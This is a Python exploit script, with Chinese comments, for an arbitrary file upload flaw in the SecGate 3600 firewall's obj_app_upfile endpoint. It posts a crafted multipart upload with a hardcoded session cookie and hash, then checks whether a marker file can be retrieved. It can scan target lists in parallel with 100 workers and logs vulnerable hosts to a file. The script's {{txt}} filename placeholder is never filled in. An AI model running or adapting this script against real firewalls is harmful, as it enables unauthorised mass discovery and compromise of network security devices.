#网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞

import requests,sys,argparse,re,json,string
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
     test=""" """
     print(test)

def main():
    banner()
    parsers=argparse.ArgumentParser(description='网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞')
    parsers.add_argument('-u','--url',dest='url',type=str,help='please input your url')
    parsers.add_argument('-f','--file',dest='file',type=str,help='please input your filepath')
    args=parsers.parse_args()

    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        #mp.map(poc, url_list) 的作用是并行地对 url_list 中的每个 URL 执行 poc 函数（或方法）
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"usag:\n\t python {sys.argv[0]} -h")
def poc(target):
    payload='/?g=obj_app_upfile'
    payload1='/attachements/{{txt}}.txt'
    headers={
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
        'Accept':'*/*',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding':'gzip, deflate',
        'Connection':'close',
        'Cookie':'__s_sessionid__=3e55n9thgj949gmqur24ciapj0',
        'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc',
        'User-Agent':'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)',
        'Content-Length':'561',
    }
    proxies={
        'http':'http://127.0.0.1:8080',
        'https':'http://127.0.0.1:8080'
    }
    data='''
      ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="MAX_FILE_SIZE"

        10000000
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="upfile"; filename="{{txt}}.txt"
        Content-Type: text/plain

        2317852

        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="submit_post"

        obj_app_upfile
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="__hash__"

        0b9d6b1ab7479ab69d9f71b05e0e9445
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc--

'''


    try:
        res1=requests.post(url=target+payload,headers=headers,verify=False,data=data)
        res2=requests.get(url=target+payload1,verify=False)
        if res1.status_code==302:
                if res2.status_code==200 and '2317852' in res2.text:
                    print(f"[+]目标存在 {target}")
                    with open('result.txt','a') as f:
                        f.write(target+'\n')
        else:
             print(f'[-]目标不存在漏洞 {target}')
    except:
        pass


if __name__ == '__main__':
    main()


